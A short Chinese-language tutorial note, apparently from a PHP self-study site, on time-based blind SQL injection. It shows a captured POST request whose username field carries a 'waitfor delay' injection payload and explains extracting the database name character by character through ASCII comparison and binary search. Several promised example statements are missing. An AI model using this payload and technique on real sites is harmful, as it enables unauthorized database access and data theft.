注入的基础知识就不说的了,只是在这里做个简单的笔记,以便之后拿起了就用。
03 Content-Type: application/x-www-form-urlencoded
04 X-Requested-With: XMLHttpRequest
05 Cookie: ASP.NET_SessionId=2k32d0nwvrzpbg55qucudt3b
06 Host: HdhCmsTestcunlide测试数据
07 Connection: Keep-alive
08 Accept-Encoding: gzip,deflate
09 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
10 Accept: */*
11
12 HdhCmsTest2cto测试数据 cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20
看POST数据,注入是发生在username这里。把username的值URL解码下这样比较清楚点。
2
3 pxnjodhe'; waitfor delay '0:0:5' --
因为延时注入是通过页面返回的时间来判断的,所以当我进行猜解的时候也就是用时间来进行猜解,比如我们可以取出db_name的第一个字符,先转换成ASCII在和数字进行比较(推荐使用<、>),在比较时我们可以用折半法,比如我们先猜解第一个字符是大写字母还是小写字母,就可以用91来做个标准小于91的为大写字母(A-F,或许是_ 、-),大于则反。
下面两个语句为例子:
2 //判断权限
4 // 数据库 名
6 //用户名
建议用时但编码状态出问题时,可以试试未编码状态。
如有错误指正下。
查看更多关于盲注-延时注入 - 网站安全 - 自学php的详细内容...